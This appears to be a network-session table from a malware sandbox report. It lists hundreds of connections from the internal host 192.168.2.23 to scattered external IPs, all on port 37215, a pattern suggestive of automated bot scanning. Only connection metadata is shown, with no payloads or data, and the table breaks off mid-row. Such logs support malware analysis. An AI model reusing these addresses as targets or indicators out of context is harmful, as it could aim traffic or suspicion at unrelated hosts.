                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16572192.168.2.2352740156.160.60.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16573192.168.2.2352162197.183.15.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16574192.168.2.235318441.216.16.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16575192.168.2.2336070137.108.168.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16576192.168.2.2338936157.47.7.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16577192.168.2.233566424.186.77.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16578192.168.2.2348860197.123.212.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16579192.168.2.2339960157.62.93.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16580192.168.2.2350372197.165.4.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16581192.168.2.2346266165.115.164.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16582192.168.2.2343694197.172.127.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16583192.168.2.2334224153.149.176.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16584192.168.2.2343902157.49.54.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16585192.168.2.23405561.208.27.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16586192.168.2.2334224157.192.45.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16587192.168.2.2337524197.123.195.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16588192.168.2.233992052.218.70.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16589192.168.2.236025679.12.240.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16590192.168.2.235152641.119.139.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16591192.168.2.233291041.137.10.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16592192.168.2.2338856155.115.121.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16593192.168.2.2334808216.175.115.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16594192.168.2.2334992148.172.140.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16595192.168.2.236054451.50.140.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16596192.168.2.2359446197.87.18.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16597192.168.2.2344128197.25.172.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16598192.168.2.2355378197.189.232.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16599192.168.2.2335314126.163.144.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16600192.168.2.234648641.205.191.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16601192.168.2.2336530197.28.139.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16602192.168.2.2360320197.210.167.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16603192.168.2.234532641.64.13.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16604192.168.2.2353270135.7.158.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16605192.168.2.2333374157.130.219.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16606192.168.2.2341390197.125.38.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16607192.168.2.233891481.169.112.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16608192.168.2.234948818.149.198.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16609192.168.2.2355598197.28.38.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16610192.168.2.235162041.117.199.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16611192.168.2.2355256157.240.224.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16612192.168.2.235803696.242.60.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16613192.168.2.234190641.157.148.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16614192.168.2.233810841.26.12.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16615192.168.2.2334226197.87.38.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16616192.168.2.2350430121.242.40.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16617192.168.2.234464641.221.208.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16618192.168.2.233325841.100.107.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16619192.168.2.2358876123.191.216.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16620192.168.2.2336876157.232.29.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16621192.168.2.2347806197.76.100.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16622192.168.2.236060041.195.29.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16623192.168.2.235256241.186.250.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16624192.168.2.2345792197.85.66.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16625192.168.2.2352584197.176.151.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16626192.168.2.2354284157.54.141.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16627192.168.2.2358010157.70.13.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16628192.168.2.2353046213.157.138.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16629192.168.2.2347894197.99.240.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16630192.168.2.235170641.194.101.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16631192.168.2.2348328157.22.148.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16632192.168.2.2360202197.39.94.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16633192.168.2.2333252157.97.220.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16634192.168.2.2342752197.45.199.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16635192.168.2.233309041.201.127.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16636192.168.2.2340366157.104.59.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16637192.168.2.2344412196.125.114.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16638192.168.2.2338734183.55.184.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16639192.168.2.2349124197.53.188.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16640192.168.2.2337656168.70.225.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16641192.168.2.234273641.31.9.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16642192.168.2.2343648144.114.252.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16643192.168.2.234511641.70.188.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16644192.168.2.2350348190.159.149.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16645192.168.2.234884241.145.224.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16646192.168.2.2349594197.68.219.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16647192.168.2.2348462197.60.132.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16648192.168.2.2353060197.183.205.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16649192.168.2.2344490157.152.57.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16650192.168.2.2333850157.120.130.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16651192.168.2.234694087.73.211.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16652192.168.2.2353072197.110.213.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16653192.168.2.2355962197.59.111.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16654192.168.2.2339712157.19.40.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16655192.168.2.2333258157.116.138.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16656192.168.2.2334926111.196.29.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16657192.168.2.2349994157.242.169.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16658192.168.2.2350700193.145.245.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16659192.168.2.2342362205.255.205.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16660192.168.2.233556241.151.25.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16661192.168.2.2333916157.115.74.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16662192.168.2.234464841.227.45.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16663192.168.2.2348218157.213.79.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16664192.168.2.2341528197.57.208.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16665192.168.2.2345582157.35.150.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16666192.168.2.2351930157.186.32.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16667192.168.2.235468854.1.159.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16668192.168.2.234768041.146.243.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16669192.168.2.2356384157.42.140.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16670192.168.2.2354386197.123.240.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16671192.168.2.2350950157.30.209.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16672192.168.2.2345044197.113.250.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16673192.168.2.2338444157.183.27.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16674192.168.2.234899012.162.253.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16675192.168.2.235780823.67.194.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16676192.168.2.2350804123.95.21.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16677192.168.2.2343574109.236.118.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16678192.168.2.2345870157.17.223.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16679192.168.2.2337604157.151.230.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16680192.168.2.2350366197.153.9.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16681192.168.2.234966818.212.105.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16682192.168.2.2334806197.211.237.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16683192.168.2.234300441.0.89.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16684192.168.2.2355576157.115.236.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16685192.168.2.2345210157.75.78.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16686192.168.2.2355024157.182.32.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16687192.168.2.235812244.154.15.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16688192.168.2.2343202197.17.4.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16689192.168.2.234984641.77.35.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16690192.168.2.2353828157.126.58.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16691192.168.2.234248296.7.130.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16692192.168.2.2334094157.237.223.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16693192.168.2.2344564157.12.97.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16694192.168.2.2358996197.217.108.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16695192.168.2.236053641.113.24.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16696192.168.2.2353282197.247.144.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16697192.168.2.233615641.104.171.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16698192.168.2.235599441.190.172.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16699192.168.2.235195241.107.192.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16700192.168.2.233655041.207.137.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16701192.168.2.2341250125.220.49.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16702192.168.2.2336452194.88.85.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16703192.168.2.233434441.190.145.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16704192.168.2.233886841.27.45.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16705192.168.2.235936053.63.227.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16706192.168.2.234988841.189.182.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16707192.168.2.2345328136.175.24.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16708192.168.2.235304641.45.135.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16709192.168.2.2360998117.176.238.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16710192.168.2.2339826197.58.181.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16711192.168.2.235033841.134.121.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16712192.168.2.2357680157.220.56.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16713192.168.2.2344766157.6.30.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16714192.168.2.2344846197.76.22.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16715192.168.2.235155841.5.118.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16716192.168.2.235454845.139.40.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16717192.168.2.2356688157.14.228.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16718192.168.2.2345474196.45.221.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16719192.168.2.2356372157.81.81.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16720192.168.2.2340642157.231.65.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16721192.168.2.2355004197.120.248.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16722192.168.2.2360012198.139.75.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16723192.168.2.233965641.140.6.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16724192.168.2.2345068178.0.226.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16725192.168.2.2334334197.33.151.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16726192.168.2.2339482157.52.41.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16727192.168.2.233677841.108.20.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16728192.168.2.2338812197.8.205.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16729192.168.2.2342592197.65.70.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16730192.168.2.2348766197.159.60.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16731192.168.2.2338688124.84.64.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16732192.168.2.2344512197.190.212.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16733192.168.2.2353270157.203.123.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16734192.168.2.2346594197.77.99.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16735192.168.2.235844041.228.146.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16736192.168.2.2342996192.147.1.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16737192.168.2.235731641.180.115.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16738192.168.2.2344892150.14.197.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16739192.168.2.2346042157.43.41.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16740192.168.2.2353474157.131.194.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16741192.168.2.235818441.78.79.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16742192.168.2.2351402157.248.37.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16743192.168.2.2347276157.16.153.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16744192.168.2.2348722157.228.207.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16745192.168.2.233434241.98.178.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16746192.168.2.2360586197.251.247.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16747192.168.2.2359414197.30.127.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16748192.168.2.234972441.201.132.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16749192.168.2.2353772157.48.217.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16750192.168.2.235924441.98.53.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16751192.168.2.2360748151.224.42.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16752192.168.2.2351984197.65.105.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16753192.168.2.2337300157.38.21.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16754192.168.2.2336466197.98.196.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16755192.168.2.235065841.42.59.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16756192.168.2.2355678157.236.80.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16757192.168.2.236089041.83.238.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16758192.168.2.236055041.42.56.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16759192.168.2.2357350197.186.112.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16760192.168.2.2360506197.74.89.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16761192.168.2.2334394157.231.145.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16762192.168.2.235701269.50.25.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16763192.168.2.2352264157.7.49.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16764192.168.2.2333418197.58.94.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16765192.168.2.2343724197.176.106.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16766192.168.2.2351096197.30.9.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16767192.168.2.2353978157.211.103.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16768192.168.2.2345838197.232.225.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16769192.168.2.2342950197.35.223.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16770192.168.2.234880641.238.251.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16771192.168.2.2348778197.101.241.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16772192.168.2.234715041.30.192.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16773192.168.2.2334110126.3.197.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16774192.168.2.233950460.32.144.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16775192.168.2.2347752157.253.13.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16776192.168.2.2348952197.10.82.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16777192.168.2.2352546197.25.35.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16778192.168.2.2355530197.168.248.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16779192.168.2.2340782157.112.154.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16780192.168.2.235079041.142.182.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16781192.168.2.2347906197.66.126.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16782192.168.2.2347836159.247.127.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16783192.168.2.2343538166.63.243.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16784192.168.2.233850644.220.14.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16785192.168.2.2336960143.3.222.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16786192.168.2.2358322157.156.225.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16787192.168.2.2350422197.115.53.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16788192.168.2.235930841.154.79.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16789192.168.2.2357986157.135.230.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
